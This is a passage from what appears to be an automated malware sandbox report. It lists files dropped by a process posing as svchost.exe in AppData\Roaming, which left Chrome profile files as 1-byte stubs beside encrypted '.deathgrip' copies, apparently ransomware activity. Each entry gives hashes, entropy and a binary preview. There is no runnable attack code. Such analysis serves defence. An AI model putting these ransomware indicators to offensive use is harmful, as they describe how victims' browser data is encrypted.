                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.104209848351332
                                                          Encrypted:false
                                                          SSDEEP:6:SOlWVtyrfyRYojLm0XuSVDJQ+BejQeYGbq0kmGSTEdY8yzPhMj:STtyr6RYo2udVDJQ+BnexbCmGXdlyzu
                                                          MD5:A2173FDC097385FE6247109C5D386D7B
                                                          SHA1:12BA652F7CED4A92017EE405952DC2F9EE5E6E84
                                                          SHA-256:0A459C5DDB6082FB76DBA19774DA4D315EA7750E8D10412403EBE0FE493BCBCB
                                                          SHA-512:A431B699715420ED7BB76CF1FB6CE130A044C12AB98D139660ACD66026451F55501AB4D24D6C538D91F51F8A0C4142C3C351FFA664A8BA9F53267F574FAFAEFB
                                                          Malicious:false
                                                          Preview:..........(?..s..u4.e...ny4DC5biRFgmjEzCV30L4jo/NkWUhvdzVCr61vUtiS+uIRJ9vxP9bKD62RgZBmi47ToBMFE4AMcMUzJ5JHm6oD52mMILhPyguzWKarya2D3O7und/XCOl+jD/Gex4qL1iGQKq/WucQQCcwJrnKizFBJBZbKsCDvnKptZ8AL2HxKJ2kGaX8YK4Wj7EvNnvhw45GInqgZEOMtKesxrv7t0wS2cDQiVOTWARPtuVD8R2pdrCTKpnFBrB/1Hn05VWIBh9kaGhdILOD/WEq6LNJE49ITZZj61J3ZuKvOopOzUCDxGcHk4g6RH+dxOl0VnGv3tQ9c0MhWEgNlo6Ziu43skqQ==

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2784
                                                          Entropy (8bit):7.905071488037961
                                                          Encrypted:false
                                                          SSDEEP:48:sAqyVYRd+x+hqyR0Yslc69aQhdQUtOM64OKspkpreoX1ZiMhTqxQ4JPObBLFLQVd:sRyVE4xG30hc691LHgM64HPl1vhSPqZY
                                                          MD5:9E528AD330F41DE57FB6D8A466BF4A1E
                                                          SHA1:81505D5F4629E4A9AE15EE19AD75B01AC2903085
                                                          SHA-256:97CD0A2BF107F3B2DB50A5F97C40A28D888E356816D1CD5F53AA468E88870377
                                                          SHA-512:896292355B8A21425F93BA17B8C54124A4AC1AE566F74BE172A1DE1FE7414F39DA98267711D61CAE2E3E6C4E47DAA140268F791C7974930FC58454788A3CEB07
                                                          Malicious:false
                                                          Preview:..........O..r......_.v..../%.c..v.8>.X...&Y.>|.`..>.....5.d.*..IKPF...(|.f0.9..o...G..6...?.X.4>\>2.Q......j.+...........j.Bh+[...g......?.,..MC.U.z.>.]w.6.C...|......5L#7..EuW...S........R..~.......,........:.</5.G....BLO.cv\S...uL.D.......>4X.).,..~..>.V..^....g....~..0..@.Q..m.._......WY......!LOat......+.re.../....C..A..@r0....N.{...M..@`..PkR....1s.d^.....R...]0.%..S..6:6Y...q!RE...f.X;Z......`4...u...W:.....&C...m.P...=.R{....l...U..s.t...,.P..0H..q$.D.u.h7`..s..;.i....../W.{a.&...i..7.n.5.[....'.j...Z.=.?{..8".$Y../..&..K.p*.x...ai..x`...i.>....s.....%.&E.A..O&.g>..N1tm....p`&f.......".......|4..h....z&...E.o._.+.|L.o..w{.nq[.....Q......5k..hp..../x....8..?.<1%.[.Lq.'..:...bd8.C..."....A.'..G...C|.L.G6..cP.&m} Cf.-...^..(.x.;.oz.?q....h.....N^........4.uB.`K{.kF...Ch......h.=.%....C..]A/\..Wj-2.U0...oL...-E.~K..5.J.lgwZ{.5....L.%.j..f......".<......E..o.xi.....@..b...%.0L2-L.....Y..$...].zbO.~./..w_...sO.....r6Ii.=

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8320
                                                          Entropy (8bit):7.977197723749569
                                                          Encrypted:false
                                                          SSDEEP:192:D7OLbgtCE6BEq76kT6X84AztgMGNDGOcxE2+:DawtTWTK4zOTGpS
                                                          MD5:8CF85B95EAEB0121167FEE79C2DB4717
                                                          SHA1:31067F5B3E2DFDA54B7D66C84C229C36B725F71E
                                                          SHA-256:7C65B580CB43EEF721C87A4112569B71E8178B47D2B7C1AB523BD4DAE495B5F1
                                                          SHA-512:1C5C454965AAC6EB288E88AA807B665DE5918EBD567F9B261BE595F67331E83A977051C557A5183E50F333B856DF70A984D441632D149C9A31EACF0E5C1C4F93
                                                          Malicious:false
                                                          Preview:..........q.0.0.....Jt.....j..c..4.E..,.........@4..#.G."T9...d.P....&.@.Hn.....,....C..-.L..Z].Sr.u.=tPt.F..m.).,...U..z..{....a..)..G..X.Sm....c...c4.....(;..8....th...............3.....M.b..[...vXJ....?Mm....e$}.-.B.... .S.t..0.r;9.......E...R.Hp..D....@...G.R......T.#wS....K.....+..F.6..i.2a..sw.....N..1E..-.R.3...v6...|...e,...+...KC...A........A#.C),..y../.1....kt..47..:R..S.S.s.&z..........^.K...^......;Dn....g.5...M~..g...IU.9.....Y......c-.W.<:z......O.....\7..:.0V..5U..*?..J}A.p..t.V.....m....M.$..".9..[.v......q[..T}S....DR2....}.C..'...~B.:....#F...%Cr..N]....6v..+'-c..WA....$.@..N...`.....|...B.....2T.#wP.I,<`7.-.6...B....p.y..z.B...b..*i...<....$D....BR.. CjDw......i....d...*.D....r#..l....../D.d1......i.../s;.lp.,A.Bg..@.Tm..._..j./>#./.$.{&....k.L.:.7J..%...vD.&K..Z..%5/-..%.*......a%/.1(.<.}.W...}.A$.}.i7..}cA;.......5..K...b..~...Y....w..S..<.........R...t.i.qg^.k.76...j.|l..W.x...C..0....y.!.-...]y....R..yr.._#..^.6&X.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6048
                                                          Entropy (8bit):7.960260403067683
                                                          Encrypted:false
                                                          SSDEEP:96:UO9WHFoZ1mCNgTM80Wt/jAPHjp+iPAFwNq1YVblO+vOBg5WvG1aaSN8y2Rm+Gqcg:UwMFoZ1mC+BtcPjH4Wq1YtlOu89eoqya
                                                          MD5:8160FF39904DBFB1E91831A538F94558
                                                          SHA1:8C9DF74593A7658D189BFC5A7B606CBF8C8C0F7C
                                                          SHA-256:90D3D4103DFCE0B2AF95DB3FEEBBEB488A52048AF33B3CB9C3804969DD33AB8C
                                                          SHA-512:1EBA01EB01439573BDBB5AFF58028AD7D6E18ED69710D5C0747D97B1BDE63F680847873FF3C9DB5C8BD5BCF4AE116C6B1C966CA6DC0C23D32027E09411A9E30B
                                                          Malicious:false
                                                          Preview:.........e?.d..H..1{E..da.C.....5...@..H...Q..`\Y5.b.j.zc.&2lh..c.U*..F.e....L.H'^P...:.'....f.......d..:]N<.l....4y.<A-M_.Lq.1w-.b.uj.g.....+.8&.#.`.....\....s.l.Bji.l....KS.[.=.l....>O.^.MQ..mu..<LI...},.j...............I...^1...#.W..w....N..+8...!x-..VC.<R.].as...;.\..)....p}..Q{A..o..8....LQ.........x....__...|..?...~.o.H.gIt..........j.........m.(0........V..:..?9...S.......(..5....I..t..t%..M..q......(..y....._-U .gj..6...A>C...P9.K.....7Z..Q.....yq<..Y,%f.Sl....=..U....1..8..N..q....n..._..;.X.7...@`.~d;Y..7....(:s..Nv.....~.[lR.....ot....7..}.m...j.._&r..7..R...H...Ye;.+G.#p@..A...w..[.C..%..J.P.....KnF....P..#..B_.R..`....)....6G.g.n..&;|.].'..h.<PN._.....S.....V.8D..U'...11....I.hP.3(.^...X.q5.V..T..4ayZ2Qh...7,t=.20.S6,d...........)...E..k.".a...GpZ.+H]FMTb.f.R..;~.."..-c..#.|../b.|m.[/u..%^..C..Y..*.....s....oX.]J@....6...0e..K...2..i..O12.ey$.....*VQ.4.wC+.....C.n?@.A..y....(.Z.....\....8^.2......K$..:.sD......`V&.......J!v.C.X

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19952
                                                          Entropy (8bit):7.990184391616252
                                                          Encrypted:true
                                                          SSDEEP:384:LnhPftMf+HyKaC/rJSR8DQJ+URdkLvhaAMVl/5jXJ2a1NyCj2UGGA:Dw16yZqlMVlhjXJ2qN7lE
                                                          MD5:46B77B6A6F111CFDC5842D02D8311A50
                                                          SHA1:830E45CF4E975DF9EC9510542521DAD5282DF4F1
                                                          SHA-256:536856134E9F5574E12990E5411A6873672F3345E7EE3FA4D50E2E47D95398A6
                                                          SHA-512:92AF7BB5D4C7749E67D3DC28F42198D7D8C78940F0C7A5F6B73AA55E65E02038CF0D0EB2A32BFA88ABF5E010641F0DAF6241A01C22F715098353B6FF1B2C71F2
                                                          Malicious:true
                                                          Preview:.........p..<A_{*.Yk....E.y...U...d!.....8...&|.3.9.?.&>9.:....f`"F..oZK.2...:..v..7..E{....J.P.n..[.rf..2S.A -.h~...a..<.K5..\...r.qk..f.t..../S.f.~..](.... .b.0v...^.....j.....w.....qQ.c....v......g(......Y.f.o..&>R.....3.c...Q8.2.0[;A}..?;...L......_Q....>.C..+_..._.....s..%./.;..E;G.~..p..-\......P^....=...E.v+..s.7:.T..k....v.Q'.,......I...0T....S.-..5...."2/k:...g...}@..........C..1&..w....A.Z..o..Q...]8~.+'...6..0.KS@.v...X...a./....:1.v&i.j..P./^@ra..G...(t2.=....b.\..w.5..B.\.+[._HMR.q6.-.+..8g)p..5...&`...:I.)*....D.*./..3...27..(..#...".32,...(.!..e.Ybd5w...Y.g....3.M..:..!.....PP....l.8Q.y.L........".......~.R^a.Q...m0.5{..6.$..<C......S).P...f....ic..^... Pbf..q..R....d%<n..P....;t...#....M%...L.8r......N....:....m......./..+5.C..7..$.......KL..R....$..NY6I;...`q.0d..z..&.C.W(.#.f.*..VK........zb{.3#..SM.!..(^....9...W..h.=>....V..#J.k..k...k0D..d~.j...n..Q,.g.%......V.8&\.3.}.jB.*_....y(E\9...V....E..l`..^K.^......AVA....'m....B.Z.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):7.877378208729302
                                                          Encrypted:false
                                                          SSDEEP:48:j0HGHB955NWfJvs5ZHZsc1hqTIvjxyGUw8HF/ywZCWgIL4Z:gOB9vIRqhZsc1hqTKxAwuF/bZCWgV
                                                          MD5:D23801297B5C6332FBA867B75F4A61BB
                                                          SHA1:A91772AE5001248A186B5D27B8CF02BEE8E314D8
                                                          SHA-256:A9B9D642841748B4CA145EFCCE9EB4612B01F2B204AA2D522FC6C17F861E7506
                                                          SHA-512:1ABC3636BF7AD4F7BD09FF36EFD085B1DCF2017C68AEFC3C844A71EBE4CE6ABECA4D151ED08A9A7CD2720F19F028A51CF2F138E56D5DEFC2B8090E2FE6BF55E8
                                                          Malicious:false
                                                          Preview:...........(C.+...)l...#Yiy................H...1b:.+..:.WwVu..#.:..|...`.T...m....b....*?...S..<./R...._R.A.T.'.....aKCY....W.C..1...... t.....1.Kt%Ly.=..[.&...+..KG1.`a^.x..2....$.I...Ze..M.Lj.......K;j......3..!Awm.k@..H.P.S0(c.r.B..<"...C....z...;.......#[L.^.6.w.,8N.......{._.v_.Y/...r..<.....G.v.rQ.....{H..L.I#...%..Y...4._.J4).2X'..6YI.+n*.Sm)E.d;C{...<j..Bk..A#\.F...6*.....n$c...o...]!..Kf.......-..II.zj./b.}.....x..IP.Q).....n|.....X....-<...D.S....h+.G|....k....*m..f..$...........$..:..ac.;f..@......S`%.x...qZ.Fi3R6....9>.7.~I.J..._.|.*.*Aw.Q(..,.,R./.._3Fk?..S..W.Fj..`.Z..7{.e...M..C.;o....P..~.....InM.C.D..A..~iu>...:....!-...,ql.7...d.'a.F.......ozal.[.^...&(..-......$Qtb?..$....4......E.s....P..:.5....~.b.8q..K.....k..\.|h....b.....i....yZ2......<......14rw....S'...K|>..O.....K..I.e.b.)B.'w:.K=..K.d.....i.....,.r.j{..[\......7....Y...!..w.l.c2.6.O..-.k.`k..Lr..b6".......^.....`J.......Pfl...=..~l..4.Y(.m.*.n....?:..i..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3232
                                                          Entropy (8bit):7.921633172654192
                                                          Encrypted:false
                                                          SSDEEP:96:D8LxukE8iG+6JDSz9KkpFDwheV5iT6NyhHAE:D8LAZG+6Jk9XDwhGkT6ohgE
                                                          MD5:9A4D688017CA15F7F51822269C7A17C5
                                                          SHA1:FC1A38E326C9155F9DCDB3050E3E08F794B257FB
                                                          SHA-256:6405A0F106F163F8295127C1D767BD83E122E81F3F46A645E2AC21976853BC15
                                                          SHA-512:5073ABC2A34E9102337BCF7B7D7E7F385736AD5C69B956EE1B1CE0CFB7E07E57D6C434062E1539FE2564396E8E7F157AC7D2546094E15CA50D8BE6B9F8A0A8F0
                                                          Malicious:false
                                                          Preview:............<U..}+..,`.#..z....W}{M.._.Ct;..].v.V.,K..5J.....:.T.u_@..C)..D.9T).:.....x.>C.}w........Q.e...!ey....oA..].ED...x..0...@.%..Q.y..g..,....4q...\....S..n-..:.7.@...^I.....vT.(..:..dy.%9vHr.:.....M].C....FU..D.=.`...p.....N.A.I>....`K.y...9..p!.......*.P.7../...f.0.Y1=v.Yu.l.X....9H.Q.5G.SJ.0.q.....87V.r.y.=QS<..'2P.Q..z..<.K....8.E...8D...\tz1g.ttLM..J7jS....o<J.M.fp....wN..A..F..?X...0J.=^..wI.".Q..........UcE-.....gt..n.S....q.%?..O.S.Z..............C..?C.D...g....C.f?..q.w.3e.r.q...[d.V...v.5.`=-.xi.6.x...&...........V,.\`:...T.....].|-.[8.}..R.?.P...6.@x.;9...X]..n..H...(.v...f.|.}...0mPY...?D>Q&rkq..m......(r.3k..ex..c|........e....UN.M't...SR.p.G.+.l..L.....S7.>...^vc.*.~....!E......F..C.;..\E.z...`...hP....u.d...p....j...#'|.\..E$.>"PB.\6.....2.Bn...m.I&.D.d .m.NB..+.6...,@7.........e......F.X.....,.l.1....3.;@.6.B..l........c>...H..K,..8uz..C.?..G....&.D^.nw.'.Z...G....G....d...V3.....*...F..>.....<%.=..j.1g..(.?:.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4192
                                                          Entropy (8bit):7.944583907047699
                                                          Encrypted:false
                                                          SSDEEP:96:EU2ZBIgIzgD71yZQndFVxRcF8dnU/rFEbKVwUp8abOSIsT:EUymgIzgC2FSF8VarybKVBnes
                                                          MD5:007790307BA2250E37FEA750DA1C5DE4
                                                          SHA1:A3A026F08379E02ECC2E583707A5A324FB4190B8
                                                          SHA-256:B6DF39A81485EE741CF99D88E7F0DF3ACAF91394F0584F9612B5E635305A7823
                                                          SHA-512:EEFA4B79C12B23DE5F4789599B7DB08CC6C170834E65A009681FCAACB28863BE59035C5A1B0FDFDC7790EDC462255898891ABD1C1BE7D22AE71F84913AA5BB59
                                                          Malicious:false
                                                          Preview:...........V)..?........g...f./;...2.]r...2...w.8.R..t.....|..G.>.hI..J..>..t.`KJ.HSN5.E<.N.o......b..1.l.B.t..;..l\]b.(..F.[.+....%.^.....R....S..e.hG.e..o.2..u...JJ.6...R..c.A..Z`=..;:.D...A..J..&..:.`.......7),.Z.X.1..F...1S.+!...D.....G....Q(.}.90....M.@+......%..>...._....{7J.C.....v.|H.....5.7.X...TX..r/.2 ..o..B.x...N.cCI.Rfc.F.x.o.c..K...M........t-....G1.k....".A...... .8tV./..?B.p..(~>...n....D2.yPz.0.H.&>..`...&.zR.@v..SkT.R........&.h....vK.o.]..0.Z.E...x).u.0a.g..W8s.?..f.+.D.b.....d.P.4....L..S.DN.^...u..h.:......V.X.'...;....L-3..{........Hk....F..uj...!..t3.M.8..u.................T*..J.B.!..~....j....."GQ^!....t.d..B....>X....N.....TJ...OZ.:...M...A.x=.\...#y|yh8..K.j.U...3..tz......K.7U...(".(.z...v...B..^1.*.Qz.f.\`.......A....l}@0.......Fm.Z...&...Lq.Aru.r.w.Q..*....G.9.....} *a)+.e11UXb.w.;..L|...X.s.. ..f/....?.!,m:.0U...J..V.........p..O).=.c...Yo...Q67..p..g.G..+..FA......c,34..+...8..j...L..\..a.c5o..F.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6128
                                                          Entropy (8bit):7.9611952287210155
                                                          Encrypted:false
                                                          SSDEEP:96:1lamXI46YpcThGozWqIWyJpEjFSUdnMS/5AUXzIFWq5jx5RCnGIWr9nJFGJFQ6bZ:5I5aqwWFSUnWUD5YfRCnGIWZObQeyQ
                                                          MD5:F8E3F653FD14B7AB2DEDCDCEDD68092C
                                                          SHA1:957150DA410A31AC2B656DCFF58F8AD9AA908394
                                                          SHA-256:1128B625EF889008A6054476DC8A281813ACE27F206CD2CA184264D7C2F4B444
                                                          SHA-512:6A8D0B4E7F3A6C4A32936330DA085212CDB886787C4CAB4A0B8B39C73AF16E7E9BC2BF9BD8AD8AAA3D55F28AF65659A71C6D0A6046E6F449F7FFCD90BA3E9576
                                                          Malicious:false
                                                          Preview:......../.r,...T_C....R6..2*}.m.....O.G..K...M...R...A.K.....G.83.K!f.Y.....b..UW......g{....<.1.,......T...Q.%....W<_.7.....*.ofil@N2o.F........D..p;.%i..%.l.W]z.E...=........[!..,..O.?.E.66..%..j....vD....J..^8..+^.5....bs:...m..w.0...!...*G....-d......,.jD[.F..X.......5.Q.c.( .......7.n}..@......8...g...+...R.v@.y4,*..."..iFd..s^...V.w.pW(.....A....u.3K..W.H...v..{...nB..+.-I..d.7....U_I|].l.....f......q...J..a...(.z.28.)..T...IZOWA..3..H0...6IHo..^.#^.u..%s.....p.@.M.......j..o.I#..>qy...Pr...c.P^..U...e......N..*.].9..r...:..,6>.....T:...?...p..OD...}../zo.o/..U.C.....m......7..Y..c..acky...&...$U.in...?-...t.Q......b.D..KA.d(..1.{j}......&.S.8h./..k.d...{I..`(qQ$.P...K]...Dk......c.).<...Fr.F.s..._.s.z.Q......`....._.!.u.S...].m....h....M.D.......>.\.|..k..c`P.j'..l]HS%d...Z.W'...x.].^...V..~....b.yq....Fw...'..U...m..IV<0...M....4....RI..OkV.v....%....x,.^....a..A..a.gm..._.-.j...P.E.w....b0.k.1.i.......".j.L|...*v.wf7.)zw..U{0.'.......GC

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10432
                                                          Entropy (8bit):7.984883949985019
                                                          Encrypted:false
